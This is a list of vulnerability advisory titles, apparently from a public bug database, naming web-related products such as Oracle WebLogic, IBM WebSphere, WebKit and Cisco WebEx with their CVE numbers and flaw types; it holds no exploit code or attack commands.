[101491] Cisco WebEx Meeting Center CVE-2017-12298 Cross Site Scripting Vulnerability
[101489] Cisco WebEx Meetings Server CVE-2017-12296 Cross Site Scripting Vulnerability
[101432] Oracle Communications WebRTC Session Controller CVE-2017-10153 Remote Security Vulnerability
[101408] Oracle WebCenter Sites CVE-2017-10033 Local Security Vulnerability
[101392] Oracle WebLogic Server CVE-2017-10336 Remote Security Vulnerability
[101374] Oracle iPlanet Web Server CVE-2017-10055 Remote Security Vulnerability
[101351] Oracle WebLogic Server CVE-2017-10152 Remote Security Vulnerability
[101322] Oracle WebCenter Content CVE-2017-10360 Remote Security Vulnerability
[101304] Oracle WebLogic Server CVE-2017-10271 Remote Security Vulnerability
[101234] IBM WebSphere Application Server CVE-2017-1503 HTTP Response Splitting Vulnerability
[101209] SAP Customer Relationship Management (CRM) IC WebClient Unspecified Spoofing Vulnerability
[101207] SAP Netweaver Web Dynpro ABAP Denial of Service Vulnerability
[101167] Cisco WebEx Meetings Server CVE-2017-12257 Multiple Cross Site Scripting Vulnerabilities
[101104] IBM Integration Bus and WebSphere Message Broker CVE-2017-1126 Information Disclosure Vulnerability
[101073] IBM WebSphere Commerce CVE-2017-1569 Unspecified Denial of Service Vulnerability
[101017] IBM WebSphere Portal CVE-2017-1577 Directory Traversal Vulnerability
[101006] WebKit Multiple Arbitrary Code Execution Vulnerabilities
[101005] Webkit CVE-2017-7109 Cross Site Scripting Vulnerability
[100998] WebKit Multiple Memory Corruption Vulnerabilities
[100996] WebKit CVE-2017-7142 Information Disclosure Vulnerability
[100995] WebKit Same Origin Policy Security Bypass And Memory Corruption Vulnerabilities
[100994] WebKit Multiple Memory Corruption Vulnerabilities
[100991] WebKit CVE-2017-7144 Information Disclosure Vulnerability
[100986] WebKit CVE-2017-7111 Memory Corruption Vulnerability
[100985] WebKit Multiple Memory Corruption Vulnerabilities
[100951] IniNet Solutions SCADA Web Server CVE-2017-13995 Authentication Bypass Vulnerability
[100932] Cisco UCS Central Software Command Line Interface CVE-2017-12255 Command Injection Vulnerability
[100893] WebKit Multiple Security Vulnerabilities
[100849] Pivotal Spring Web Flow CVE-2017-8039 Incomplete Fix Security Bypass Vulnerability
[100830] Mongoose Web Server CVE-2017-11567 Cross Site Request Forgery Vulnerability
[100805] SAP NetWeaver Web Dynpro Java Cross Site Scripting Vulnerability
[100786] SAP Web Dynpro ABAP Unspecified Cross Site Scripting Vulnerability
[100755] Microsoft Windows Graphics Device Interface CVE-2017-8676 Local Information Disclosure Vulnerability
[100699] IBM WebSphere Portal CVE-2017-1189 Cross Site Scripting Vulnerability
[100668] SpiderControl SCADA Web Server CVE-2017-12728 Local Code Execution Vulnerability
[100613] WebKit CVE-2017-7071 Use-After-Free Remote Code Execution Vulnerability
[100535] NetApp StorageGRID Webscale CVE-2017-12422 Arbitrary File Deletion Vulnerability
[100531] IBM Sametime Web Player CVE-2016-2980 Arbitrary Script Injection Vulnerability
[100526] Advantech WebAccess ICSA-17-241-02 Multiple Security Vulnerabilities
[100456] SpiderControl SCADA Web Server CVE-2017-12694 Directory Traversal Vulnerability
[100394] IBM WebSphere Application Server CVE-2017-1501 Information Disclosure Vulnerability
[100231] Advantech WebAccess SQL Injection Vulnerability
[100221] Advantech WebAccess 'nvA1Media.ocx' Stack Buffer Overflow Vulnerability
[100216] Advantech WebAccess Stack Buffer Overflow Vulnerability
[100205] Fortinet Fortiweb CVE-2017-7737 Information Disclosure Vulnerability
[100177] SAP NetWeaver K.M. Web Page Composer URI Redirection Vulnerability
[100167] SAP Web Intelligence BI Launchpad SSRF Security Bypass Vulnerability
[100165] SAP Customer Relationship Management (CRM) WebClient UI Cross Site Scripting Vulnerability
[100137] IBM WebSphere Application Server CVE-2017-1504 Information Disclosure Vulnerability
[100021] IBM WebSphere MQ Internet Pass-Thru CVE-2017-1118 Denial of Service Vulnerability
[100007] IBM WebSphere Portal CVE-2017-1303 Cross Site Scripting Vulnerability
[99967] Cisco Web Security Appliance CVE-2017-6751 Remote Security Bypass Vulnerability
[99965] Telerik Web UI CVE-2017-9248 Cryptographic Security Bypass Vulnerability
[99961] IBM WebSphere Application Server CVE-2017-1380 Cross Site Scripting Vulnerability
[99960] IBM WebSphere Application Server CVE-2017-1382 Local Security Bypass Vulnerability
[99924] Cisco AsyncOS for Web Security Appliance CVE-2017-6750 Insecure Default Password Vulnerability
[99918] Cisco Web Security Appliance CVE-2017-6748 Local Command Injection Vulnerability
[99917] IBM WebSphere Application Server CVE-2017-1381 Local Information Disclosure Vulnerability
[99888] WebKit CVE-2017-7038 Cross Site Scripting Vulnerability
[99885] WebKit Multiple Memory Corruption Vulnerabilities
[99875] Cisco Web Security Appliance CVE-2017-6749 HTML Injection Vulnerability
[99807] Oracle WebCenter Content CVE-2017-10075 Remote Security Vulnerability
[99801] Oracle WebCenter Content CVE-2017-10040 Remote Security Vulnerability
[99653] Oracle WebLogic Server CVE-2017-10063 Remote Security Vulnerability
[99652] Oracle WebLogic Server CVE-2017-10148 Remote Security Vulnerability
[99651] Oracle WebLogic Server CVE-2017-10147 Remote Security Vulnerability
[99650] Oracle WebLogic Server CVE-2017-10123 Remote Security Vulnerability
[99644] Oracle WebLogic Server CVE-2017-10178 Remote Security Vulnerability
[99634] Oracle WebLogic Server CVE-2017-10137 Remote Security Vulnerability
[99614] Cisco WebEx Browser Extension CVE-2017-6753 Remote Code Execution Vulnerability
[99493] IBM WebSphere MQ CVE-2017-1337 Plaintext Credentials Information Disclosure Vulnerability
[99491] IBM WebSphere Commerce CVE-2017-1398 Unspecified Open Redirection Vulnerability
[99476] Advantech WebOP Designer Heap Buffer Overflow Vulnerability
[99373] Webmin CVE-2017-9313 Multiple Cross Site Scripting Vulnerabilities
[99368] IBM Integration Bus and WebSphere Message Broker Local Information Disclosure Vulnerability
[99365] IBM Integration Bus and WebSphere Message Broker CVE-2017-1144 Local Denial of Service Vulnerability
[99350] IBM WebSphere Portal CVE-2017-1217 Cross Site Scripting Vulnerability
[99343] Siemens Viewport for Web Office Portal CVE-2017-6869 Remote Security Bypass Vulnerability
[99232] OpenWebif Plugin CVE-2017-9807 Arbitrary Code Execution Vulnerability
[99196] Cisco WebEx Network Recording Player CVE-2017-6669 Multiple Buffer Overflow Vulnerabilities
[99193] Foscam C1 Webcam CVE-2016-8731 Hard Coded Credentials Authentication Bypass Vulnerability
[99136] IBM WebSphere MQ CVE-2017-1117 Denial of Service Vulnerability
[99115] WebKit CVE-2017-7005 Type Confusion Remote Code Execution Vulnerability
[99070] SAP Web Dispatcher Remote Code Injection Vulnerability
[99058] OSIsoft PI Web API CVE-2017-7926 Cross-Site Request Forgery Vulnerability
[99038] SAP BusinessObjects Web Intelligence Unspecified Cross Site Scripting Vulnerability
[99016] Sophos Web Appliance CVE-2017-9523 Cross Site Scripting Vulnerability
[98785] Pivotal Spring Web Flow CVE-2017-4971 Security Bypass Vulnerability
[98770] IBM WebSphere MQ CVE-2016-6089 Local Security Bypass Vulnerability
[98700] WebKit CVE-2017-2493 Same Origin Policy Security Bypass Vulnerability
[98673] Roundcube Webmail CVE-2015-5382 Information Disclosure Vulnerability
[98671] Roundcube Webmail CVE-2015-5381 Cross Site Scripting Vulnerability
[98602] Multiple BestWebSoft WordPress Plugins CVE-2017-2171 Cross Site Scripting Vulnerability
[98544] Schneider Electric Wonderware InduSoft Web Studio Local Privilege Escalation Vulnerability
[98473] Webkit Cross Site Scripting and Arbitrary Code Execution Vulnerabilities
[98456] WebKit CVE-2017-2521 Unspecified Memory Corruption Vulnerability
[98455] WebKit CVE-2017-2530 Memory Corruption Vulnerability
[98454] WebKit CVE-2017-6984 Unspecified Memory Corruption Vulnerability
[98445] RoundCube Webmail CVE-2017-8114 Multiple Privilege Escalation Vulnerabilities
[98419] IBM WebSphere Application Server CVE-2017-1137 Information Disclosure Vulnerability
[98387] Cisco WebEx Meetings Server CVE-2017-6651 Information Disclosure Vulnerability
[98382] Fortinet Fortiweb CVE-2017-3129 Cross Site Scripting Vulnerability
[98340] IBM WebSphere Portal CVE-2017-1156 Unspecified Open Redirection Vulnerability
[98338] IBM WebSphere Cast Iron Solution CVE-2016-9691 XML External Entity Denial of Service Vulnerability
[98337] IBM WebSphere Cast Iron Solution CVE-2016-9692 Denial of Service Vulnerability
[98311] Advantech WebAccess CVE-2017-7929 Directory Traversal Vulnerability
[98298] Microsoft Windows Graphics Device Interface CVE-2017-0190 Information Disclosure Vulnerability
[98142] IBM WebSphere Application Server CVE-2017-1194 Cross Site Request Forgery Vulnerability
[98091] WordPress CopySafe Web Protection Plugin CVE-2017-8100 Cross Site Request Forgery Vulnerability
[98027] IBM WebSphere Commerce CVE-2017-1170 Local Session Hijacking Vulnerability
[98004] Opera Web Browser CVE-2016-4075 Address Bar Spoofing Vulnerability
[97907] Oracle WebCenter Sites CVE-2017-3603 Remote Security Vulnerability
[97905] Oracle WebCenter Sites CVE-2017-3598 Remote Security Vulnerability
[97904] Oracle WebCenter Sites CVE-2017-3597 Remote Security Vulnerability
[97901] Oracle WebCenter Sites CVE-2017-3594 Remote Security Vulnerability
[97899] Oracle WebCenter Sites CVE-2017-3591 Remote Security Vulnerability
[97894] Oracle WebLogic Server CVE-2017-3531 Remote Security Vulnerability
[97887] Oracle WebCenter Sites CVE-2017-3595 Remote Security Vulnerability
[97884] Oracle WebLogic Server CVE-2017-3506 Remote Security Vulnerability
[97879] Oracle WebCenter Sites CVE-2017-3593 Remote Security Vulnerability
[97875] Oracle WebCenter Sites CVE-2017-3596 Remote Security Vulnerability
[97842] Oracle WebCenter Sites CVE-2017-3554 Remote Security Vulnerability
[97823] Oracle WebCenter Sites CVE-2017-3602 Remote Security Vulnerability
[97809] Oracle WebCenter Sites CVE-2017-3541 Remote Security Vulnerability
[97804] Oracle WebCenter Sites CVE-2017-3545 Remote Security Vulnerability
[97769] Oracle WebCenter Content CVE-2017-3625 Remote Security Vulnerability
[97768] Oracle WebCenter Sites CVE-2017-3543 Remote Security Vulnerability
[97760] Oracle WebCenter Sites CVE-2017-3542 Remote Security Vulnerability
[97753] Oracle WebCenter Sites CVE-2017-3540 Remote Security Vulnerability
[97578] SAP Web Dynpro Flash Island XML External Entity Injection Vulnerability
[97495] WebsiteBaker CVE-2017-7410 Multiple SQL Injection Vulnerabilities
[97492] Trend Micro InterScan Web Security Virtual Appliance CVE-2017-6339 Security Bypass Vulnerability
[97487] Trend Micro InterScan Web Security Virtual Appliance CVE-2017-6340 HTML Injection Vulnerability
[97482] Trend Micro InterScan Web Security Virtual Appliance Privilege Escalation Vulnerability
[97384] WebORB for Java Remote Code Execution and XML External Entity Injection Vulnerabilities
[97311] Magmi 'magmi/web/ajax_gettime.php' Cross Site Scripting Vulnerability
[97310] Openeclass 'webconf/webconf.php' Multiple Cross Site Scripting Vulnerabilities
[97298] WebKit CVE-2017-5949 Denial of Service Vulnerability
[97261] Sophos Web Appliance Multiple Command Injection and Session Fixation Vulnerabilities
[97176] WebKit Memory Corruption and Information Disclosure Vulnerabilities
[97174] CODESYS Web Server Stack Based Buffer Overflow and File Upload Vulnerabilities
[97143] WebKit CVE-2017-2415 Remote Code Execution Vulnerability
[97133] WebKit CVE-2017-2471 Remote Code Execution Vulnerability
[97130] WebKit Multiple Security Vulnerabilities
[97075] IBM WebSphere Portal CVE-2017-1120 Cross Site Scripting Vulnerability
[97039] LastPass 'websiteConnector.js' Remote Code Execution Vulnerability
[96939] MaNGOSWebV4 Multiple Cross Site Scripting Vulnerabilities
[96935] webpagetest Multiple Cross Site Scripting Vulnerabilities
[96923] Security guide for website operators CVE-2017-2128 OS Command Injection Vulnerability
[96918] Cisco WebEx Meetings Server CVE-2017-3880 Authentication Bypass Vulnerability
[96912] Cisco WebEx Meetings Server CVE-2017-3811 XML External Entity Information Disclosure Vulnerability
[96906] WordPress Webapp-Builder Plugin CVE-2017-1002002 Arbitrary File Upload Vulnerability
[96879] SAP Web Dynpro ABAP Unspecified Cross Site Scripting Vulnerability
[96876] SAP HANA Web Workbench SQL Injection Vulnerability
[96841] IBM WebSphere Application Server CVE-2017-1151 Remote Privilege Escalation Vulnerability
[96759] IBM WebSphere MQ CVE-2017-1145 Denial of Service Vulnerability
[96624] IBM WebSphere Commerce CVE-2016-5894 Local Information Disclosure Vulnerability
[96584] MaNGOSWebV4 CVE-2017-6478 Cross Site Scripting Vulnerability
[96556] EPSON TMNet WebConfig CVE-2017-6443 Multiple HTML Injection Vulnerabilities
[96553] WPO-Foundation WebPageTest CVE-2017-6396 Cross Site Scripting Vulnerability
[96542] Eaton xComfort Ethernet Communication Interface CVE-2017-9368 Information Disclosure Vulnerability
[96511] Drupal RESTful Web Services Information Disclosure Vulnerability
[96441] IBM WebSphere MQ CVE-2016-9009 Denial of Service Vulnerability
[96412] IBM WebSphere MQ CVE-2016-8986 Denial of Service Vulnerability
[96403] IBM WebSphere MQ CVE-2016-8915 Denial of Service Vulnerability
[96400] IBM WebSphere MQ CVE-2016-3052 Information Disclosure Vulnerability
[96394] IBM WebSphere MQ CVE-2016-3013 Denial of Service Vulnerability
[96387] RoundCube Webmail CVE-2015-2180 Remote Command Execution Vulnerability
[96337] WebKit CVE-2016-7762 Cross Site Scripting Vulnerability
[96297] Symantec Web Gateway CVE-2016-9096 Multiple Cross Site Scripting Vulnerabilities
[96279] IBM WebSphere Message Broker CVE-2016-9010 Clickjacking Vulnerability
[96274] IBM Integration Bus and WebSphere Message Broker XML External Entity Injection Vulnerability
[96252] Trend Micro InterScan Web Security Virtual Appliance Multiple Security vulnerabilities
[96227] Webmin Unspecified Multiple Cross Site Scripting Vulnerabilities
[96210] Advantech WebAccess CVE-2017-5175 DLL Loading Local Code Execution Vulnerability
[96164] IBM WebSphere Application Server CVE-2017-1121 Cross Site Scripting Vulnerability
[96125] ZoneMinder 'web/views/file.php' Local File Include Vulnerability
[96076] IBM WebSphere Application Server CVE-2016-9736 Information Disclosure Vulnerability
[95971] Honeywell XL Web II Controller Multiple Security Vulnerabilities
[95858] Sophos Web Appliance CVE-2016-9554 Remote Command Injection Vulnerability
[95853] Sophos Web Appliance CVE-2016-9553 Multiple Remote Command Injection Vulnerabilities
[95820] EMC RSA Web Threat Detection CVE-2016-0919 Unspecified HTML Injection Vulnerability
[95737] Cisco WebEx Extension 'magic URL' Remote Command Execution Vulnerability
[95736] WebKit Multiple Memory Corruption Vulnerabilities
[95735] Webkit CVE-2017-2371 Security Bypass Vulnerability
[95728] WebKit CVE-2017-2363 Cross-Origin Security Bypass Vulnerability
[95727] WebKit Multiple Security Vulnerabilities
[95725] WebKit CVE-2017-2364 Cross-Origin Security Bypass Vulnerability
[95676] Weblate CVE-2017-5537 Information Disclosure Vulnerability
[95650] IBM WebSphere Application Server CVE-2016-8919 Denial of Service Vulnerability
[95643] Cisco WebEx Meetings Server CVE-2017-3795 Local Security Bypass Vulnerability
[95642] Cisco WebEx Meeting Center CVE-2017-3799 Open Redirection Vulnerability
[95641] Cisco WebEx Meetings Server CVE-2017-3796 Remote Command Execution Vulnerability
[95639] Cisco WebEx Meetings Server CVE-2017-3797 Information Disclosure Vulnerability
[95635] Cisco WebEx Meetings Server CVE-2017-3794 Cross Site Request Forgery Vulnerability
[95465] Oracle WebLogic Server CVE-2017-3248 Remote Security Vulnerability
[95416] Web Client CVE-2017-5151 Unspecified SQL Injection Vulnerability
[95410] Advantech WebAccess 'updateTemplate.aspx' SQL Injection and Authentication Bypass Vulnerabilities
[95355] OSIsoft PI Coresight and PI Web API CVE-2017-5153 Information Disclosure Vulnerability
[95317] IBM WebSphere MQ CVE-2016-0360 Remote Code Execution Vulnerability
[95312] Olive Design WEB SCHEDULE 'month' Parameter Cross Site Scripting Vulnerability
[95293] Joomla! aWeb Cart Watching System Extension CVE-2016-10114 Multiple SQL Injection Vulnerabilities
[95154] IBM WebSphere Application Server CVE-2016-8934 Cross Site Scripting Vulnerability
[95103] IBM Security Access Manager for Web CVE-2016-3045 Information Disclosure Vulnerability
[95060] Vesta Control Panel 'bin/v-get-web-domain-value' Script Local Command Injection Vulnerability
[94962] Siemens Desigo PX Web Modules CVE-2016-9154 Insufficient Entropy Vulnerability
[94913] WebKit CVE-2016-7623 Information Disclosure Vulnerability
[94909] WebKit CVE-2016-7592 Denial of Service Vulnerability
[94782] Sauter NovaWeb Web HMI CVE-2016-5782 Authentication Bypass Vulnerability
[94774] Cisco Web Security Appliance CVE-2016-9212 Remote Security Bypass Vulnerability
[94641] IBM WebSphere Message Broker CVE-2016-6080 Information Disclosure Vulnerability
[94599] Boa Webserver CVE-2016-9564 Stack Buffer Overflow Vulnerability
[94597] Lenovo System Interface Foundation CVE-2016-8223 Local Privilege Escalation Vulnerability
[94430] WebKit CVE-2016-4764 Multiple Memory Corruption Vulnerabilities
[94413] IBM Web Content Manager Production Analytics Unspecified Cross Site Scripting Vulnerability
[94383] Apereo Webproxy Portlet Information Disclosure Vulnerability
[94274] Sophos Web Appliance Privilege Escalation and Remote Code Execution Vulnerabilities
[94174] SAP NetWeaver Java AS 'Webdynpro' Component Information Disclosure Vulnerability
[93949] WebKit Memory Corruption and Information Disclosure Vulnerabilities
[93928] Libwebp 'gif2webp.c' Multiple Integer Overflow Vulnerabilities
[93911] Cisco AsyncOS for Email and Web Security Appliances Remote Security Bypass Vulnerability
[93873] IBM WebSphere Commerce CVE-2016-6090 Information Disclosure Vulnerability
[93853] WebKit CVE-2016-4677 Memory Corruption Vulnerability
[93851] WebKit Multiple Security Vulnerabilities
[93791] Drupal Webform Module Access Bypass Vulnerability
[93692] Oracle WebLogic Server CVE-2016-5535 Remote Code Execution Vulnerability
[93552] OSIsoft PI Web API 2015 R2 CVE-2016-8353 Account Permission Security Vulnerability
[93529] Juniper Junos J-Web CVE-2016-4923 Cross Site Scripting Vulnerability
[93477] Webmin Usermin CVE-2016-4897 Multiple Cross Site Scripting Vulnerabilities
[93352] INDAS Web SCADA CVE-2016-8343 Directory Traversal Vulnerability
[93284] Symantec Web Gateway CVE-2016-5313 Command Injection Vulnerability
[93184] libgd 'gd_webp.c' Integer Overflow Vulnerability
[93162] IBM WebSphere Application Server CVE-2016-5983 Remote Code Execution Vulnerability
[93146] IBM WebSphere MQ CVE-2016-0379 Denial of Service Vulnerability
[93143] IBM WebSphere Application Server Liberty CVE-2016-0378 Information Disclosure Vulnerability
[93053] Apple Safari/Webkit/iOS Multiple Security Vulnerabilities
[93017] IBM WebSphere Portal CVE-2016-5954 Denial of Service Vulnerability
[93013] IBM WebSphere Application Server CVE-2016-5986 Information Disclosure Vulnerability
[92986] IBM WebSphere Application Server Liberty CVE-2016-3040 Open Redirect Vulnerability
[92985] IBM WebSphere Application Server Liberty Profile CVE-2016-3042 Cross Site Scripting Vulnerability
[92959] Cisco WebEx Meetings Server CVE-2016-1482 Command Injection Vulnerability
[92957] Cisco WebEx Meetings Server CVE-2016-1483 Denial of Service Vulnerability
[92955] Cisco Web Security Appliance CVE-2016-6407 Denial of Service Vulnerability
[92899] Blue Coat K9 Web Protection DLL Loading Remote Code Execution Vulnerability
[92874] Google Nexus Qualcomm Radio Interface Layer CVE-2016-3864 Privilege Escalation Vulnerability
[92711] Cisco WebEx Meetings Player CVE-2016-1415 Denial of Service Vulnerability
[92708] Cisco WebEx Meetings Player CVE-2016-1464 Remote Code Execution Vulnerability
[92701] Opera Web Browser for Android CVE-2016-6908 Unspecified Address Bar Spoofing Vulnerability
[92690] WebKit CVE-2016-4588 Unspecified Memory Corruption Vulnerability
[92654] RoundCube Webmail CVE-2016-4069 Cross Site Request Forgery Vulnerability
[92653] WebKit CVE-2016-4657 Unspecified Memory Corruption Vulnerability
[92603] Splunk Web Unspecified Open Redirection Vulnerability
[92562] PHP 'ext/curl/interface.c' Denial of Service Vulnerability
[92536] OSSEC Web UI CVE-2016-4847 Unspecified Cross Site Scripting Vulnerability
[92526] Navis WebAccess Unspecified SQL Injection Vulnerability
[92519] Cisco WebEx Meetings Server CVE-2016-1484 Information Disclosure Vulnerability
[92514] IBM WebSphere Application Server CVE-2016-0377 Information Disclosure Vulnerability
[92505] IBM WebSphere Application Server CVE-2016-0385 Security Bypass Vulnerability
[92405] Drupal Piwik Web Analytics Module Cross Site Scripting Vulnerability
[92402] WebNMS Framework Multiple Security Vulnerabilities
[92366] ownCloud WebDAV 'COPY' action Security Bypass Vulnerability
[92354] IBM WebSphere Application Server CVE-2016-2960 Denial of Service Vulnerability
[92344] IBM Connections Portlets For WebSphere Portal CVE-2016-2989 Open Redirect Vulnerability
[92217] WebKit Multiple Memory Corruption Vulnerabilities
[92197] Fotoware Fotoweb 'to' Parameter Cross Site Scripting Vulnerability
[92184] Splunk Web Unspecified Cross Site Scripting Vulnerability
[92183] Splunk Web Unspecified Open Redirection Vulnerability
[92180] IBM WebSphere Portal CVE-2016-2925 Unspecified Cross Site Scripting Vulnerability
[92147] Barracuda Web App Firewall and Load Balancer Arbitrary Command Injection Vulnerability
[92072] PHP 'interface.c' Heap Corruption Denial of Service Vulnerability
[92030] Oracle WebCenter Sites CVE-2016-3502 Remote Security Vulnerability
[92025] Oracle WebCenter Sites CVE-2016-3487 Remote Security Vulnerability
[92019] Oracle WebLogic Server CVE-2016-3499 Remote Security Vulnerability
[92016] Oracle WebLogic Server CVE-2016-3586 Remote Security Vulnerability
[92013] Oracle WebLogic Server CVE-2016-3510 Remote Security Vulnerability
[92003] Oracle WebLogic Server CVE-2016-3445 Remote Security Vulnerability
[91835] WebKit Content Spoofing and Cross Site Scripting Vulnerabilities
[91827] WebKit CVE-2016-4586 Multiple Unspecified Memory Corruption Vulnerabilities
[91799] Cisco WebEx Meetings Server CVE-2016-1448 Cross Site Request Forgery Vulnerability
[91786] Cisco WebEx Meetings Server CVE-2016-1446 SQL Injection Vulnerability
[91781] Cisco WebEx Meetings Server CVE-2016-1447 Cross Site Scripting Vulnerability
[91780] Cisco WebEx Meetings Server CVE-2016-1449 Cross Site Scripting Vulnerability
[91779] Cisco WebEx Meetings Server CVE-2016-1450 Command Injection Vulnerability
[91771] Fortinet FortiWeb CVE-2016-5092 Directory Traversal Vulnerability
[91768] Fortinet FortiWeb CVE-2016-4066 Cross Site Request Forgery Vulnerability
[91762] Drupal RESTful Web Services Module Remote Code Execution Vulnerability
[91759] Juniper Junos J-Web CVE-2016-1279 Remote Privilege Escalation Vulnerability
[91749] Drupal Webform Multiple File Upload Module Remote Code Execution Vulnerability
[91670] Moxa Device Server Web Console CVE-2016-4503 Authorization Bypass Vulnerability
[91572] Rexroth Bosch BLADEcontrol-WebVIS SQL Injection and Cross Site Scripting Vulnerabilities
[91551] IBM WebSphere DataPower XC10 CVE-2016-2870 Denial of Service Vulnerability
[91544] IBM WebSphere Commerce CVE-2016-2863 Unspecified Cross Site Request Forgery Vulnerability
[91533] IBM WebSphere Commerce CVE-2016-2862 Unspecified Cross Site Scripting Vulnerability
[91518] IBM WebSphere Application Server Liberty Profile CVE-2016-2923 Information Disclosure Vulnerability
[91517] WebSphere Application Server Liberty Profile Remote Privilege Escalation Vulnerability
[91515] IBM WebSphere Application Server Liberty CVE-2016-0389 Information Disclosure Vulnerability
[91484] IBM WebSphere Application Server CVE-2016-0359 HTTP Response Splitting Vulnerability
[91468] Palo Alto Networks API Management Interface Denial of Service Vulnerability
[91458] Cisco Web Security Appliance CVE-2016-1440 Denial of Service Vulnerability
[91358] WebKit CVE-2016-1864 Information Disclosure Vulnerability
[91346] Advantech WebAccess Multiple Security Vulnerabilities
[91258] IBM WebSphere Portal CVE-2016-2901 Cross Site Request Forgery Vulnerability
[91238] WebARENA Service formmail CVE-2016-1230 Unspecified Cross Site Scripting Vulnerability
[91206] SAP Web-Survey XML External Entity Injection Vulnerability
[91077] VTScada WAP interface Multiple Security Vulnerabilities
[91073] IBM WebSphere MQ CVE-2015-7462 Local Information Disclosure Vulnerability
[91064] IBM WebSphere MQ CVE-2015-7473 Local Security Bypass Vulnerability
[91060] IBM WebSphere MQ CVE-2016-0260 Denial of Service Vulnerability
[91050] Google Android libwebm CVE-2016-2464 Memory Corruption Vulnerability
[91041] IBM WebSphere MQ CVE-2016-0259 Local Information Disclosure Vulnerability
[90987] Fonality HUDweb Plugin Multiple Security Vulnerabilities
[90953] Websockify 'websocket.c' Buffer Overflow Vulnerability
[90951] IBM WebSphere eXtreme Scale CVE-2016-0400 HTTP Response Splitting Vulnerability
[90950] IBM WebSphere eXtreme Scale CVE-2016-2861 Information Disclosure Vulnerability
[90908] Cisco WebEx Meeting Center CVE-2016-1410 User Enumeration Vulnerability
[90880] RoundCube Webmail 'content page' HTML-injection Vulnerability
[90809] Collectd-web 'ajax_post.php' Cross Site Scripting Vulnerability
[90790] Trend Micro InterScan Web Security Virtual Appliance Multiple Remote Code Execution Vulnerabilities
[90769] Epoch Web Mailing List CVE-2016-1211 Cross Site Scripting Vulnerability
[90748] HP RESTful Interface Tool CVE-2016-2023 Unspecified Local Information Disclosure Vulnerability
[90702] web2py Multiple Security Vulnerabilities
[90638] Multiple Meteocontrol WEB'log Products CVE-2016-2296 Information Disclosure Vulnerability
[90632] Multiple Meteocontrol WEB'log Products CVE-2016-2297 Remote Command Execution Vulnerability
[90629] Multiple Meteocontrol WEB'log Products CVE-2016-2298 Information Disclosure Vulnerability
[90599] Opera Web Browser CVE-2004-0717 Remote Security Vulnerability
[90593] WebSTAR CVE-2004-0697 Information Disclosure Vulnerability
[90587] Netfile Ftp Web Server CVE-2004-0677 Denial-Of-Service Vulnerability
[90581] Websphere Edge server Caching proxy CVE-2004-0684 Denial-Of-Service Vulnerability
[90577] WebSTAR CVE-2004-0698 Local Security Vulnerability
[90576] Opera Web Browser CVE-2004-0872 Remote Security Vulnerability
[90492] Opera Web Browser CVE-2004-1489 Information Disclosure Vulnerability
[90404] Twilight Utilities Web Server CVE-2004-2380 Directory Traversal Vulnerability
[90403] Twilight Utilities Web Server CVE-2004-2376 Denial-Of-Service Vulnerability
[90342] 04Webserver CVE-2004-2661 Information Disclosure Vulnerability
[90322] 04Webserver CVE-2004-2662 Denial-Of-Service Vulnerability
[90283] WebSeries Payment Application CVE-2005-0287 Remote Security Vulnerability
[90269] Opera Web Browser CVE-2005-0457 Local Security Vulnerability
[90257] Weblogic Server CVE-2005-0432 Remote Security Vulnerability
[90252] Websphere Application Server CVE-2005-0425 Remote Security Vulnerability
[90240] webmin-1.140.ebuild CVE-2005-0427 Remote Security Vulnerability
[90231] Phpwebsite CVE-2005-0572 Information Disclosure Vulnerability
[90224] WebMod CVE-2005-0608 Denial-Of-Service Vulnerability
[90215] Phpwebsite CVE-2005-0565 Remote Security Vulnerability
[90204] Active WebCam CVE-2005-0733 Remote Security Vulnerability
[90193] Active WebCam CVE-2005-0732 Remote Security Vulnerability
[90181] Active WebCam CVE-2005-0731 Denial-Of-Service Vulnerability
[90178] Active WebCam CVE-2005-0730 Denial-Of-Service Vulnerability
[90171] WebSVN CVE-2016-1236 Cross Site Scripting Vulnerability
[90152] Active WebCam CVE-2005-0734 Denial-Of-Service Vulnerability
[90148] WebAPP CVE-2005-0927 Remote Security Vulnerability
[90128] Webcamxp Pro CVE-2005-1190 Denial-Of-Service Vulnerability
[90117] Java System Web Server CVE-2005-1150 Denial-Of-Service Vulnerability
[90088] Web Security CVE-2005-1346 Denial-Of-Service Vulnerability
[89960] Webcam Lite CVE-2005-1617 Information Disclosure Vulnerability
[89950] Jeuce Personal Web Server CVE-2005-1661 Denial-Of-Service Vulnerability
[89946] Netfile Ftp Web Server CVE-2005-1646 Denial-Of-Service Vulnerability
[89909] Nextweb (i)Site CVE-2005-1836 Denial-Of-Service Vulnerability
[89899] Java System Web Server CVE-2005-1889 Remote Security Vulnerability
[89870] Liteweb CVE-2005-1908 Security Bypass Vulnerability
[89837] Web Frontend CVE-2005-2029 Remote Security Vulnerability
[89815] Webserver CVE-2005-2008 Remote Security Vulnerability
[89769] Community Link Pro Web Editor CVE-2005-2111 Remote Security Vulnerability
[89683] Webx CVE-2001-1532 Remote Security Vulnerability
[89675] Webmin CVE-2001-1530 Local Security Vulnerability
[89627] Webx CVE-2001-1532 Remote Security Vulnerability
[89619] Webmin CVE-2001-1530 Local Security Vulnerability
[89565] KF Web Server CVE-2002-1032 Denial-Of-Service Vulnerability
[89559] Jana Web Server CVE-2002-1065 Remote Security Vulnerability
[89556] LocalWEB2000 CVE-2002-1353 Remote Security Vulnerability
[89554] Webserver 4 Everyone CVE-2002-1504 Directory Traversal Vulnerability
[89517] SuperScout Web Filter for Windows NT/2000 CVE-2002-0706 Remote Security Vulnerability
[89515] Webmin CVE-2002-2201 Remote Security Vulnerability
[89509] IBM AIX Websecure CVE-2002-1040 Remote Security Vulnerability
[89483] Office Web Components 2002 CVE-2002-1339 Remote Security Vulnerability
[89475] Office Web Components 2002 CVE-2002-1340 Remote Security Vulnerability
[89473] Wwwebbb Forum CVE-2002-2085 Directory Traversal Vulnerability
[89464] GoAhead WebServer CVE-2002-0680 Directory Traversal Vulnerability
[89444] Opera Web Browser CVE-2005-2273 Remote Security Vulnerability
[89437] Opera Web Browser CVE-2005-2309 Denial-Of-Service Vulnerability
[89402] Website Baker CVE-2005-2436 Remote Security Vulnerability
[89384] Savewebportal CVE-2005-2687 Remote Security Vulnerability
[89374] WebLogic Portal CVE-2005-2680 Security Bypass Vulnerability
[89373] Savewebportal CVE-2005-2686 Directory Traversal Vulnerability
[89370] Savewebportal CVE-2005-2685 Remote Security Vulnerability
[89366] PHP Weblog CVE-2005-2722 Information Disclosure Vulnerability
[89354] Savant Webserver CVE-2005-2859 Local Security Vulnerability
[89341] Cisco WebEx Productivity Tools CVE-2016-4349 DLL Loading Local Code Execution Vulnerabilities
[89338] Web News CVE-2005-2897 Information Disclosure Vulnerability
